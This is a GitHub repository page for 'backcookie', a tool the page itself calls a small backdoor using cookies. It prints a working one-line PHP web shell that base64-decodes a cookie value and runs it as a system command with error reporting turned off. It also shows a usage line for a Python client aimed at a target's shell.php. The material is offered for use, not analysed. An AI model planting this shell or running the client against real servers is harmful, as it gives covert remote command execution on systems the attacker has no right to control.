Skip to content

juaneljach/backcookie

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

25 Commits
 
 
 
 
 
 

Repository files navigation

backcookie

Total views

Small backdoor using cookie.

==========

<?php error_reporting(0); system(base64_decode($_COOKIE["yourcookie"])); ?>
Example: python backcookie.py -u http://target.com/shell.php -c name_cookie

Developer


Copyright, 2013 by José Pino


About

Small backdoor using cookie.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%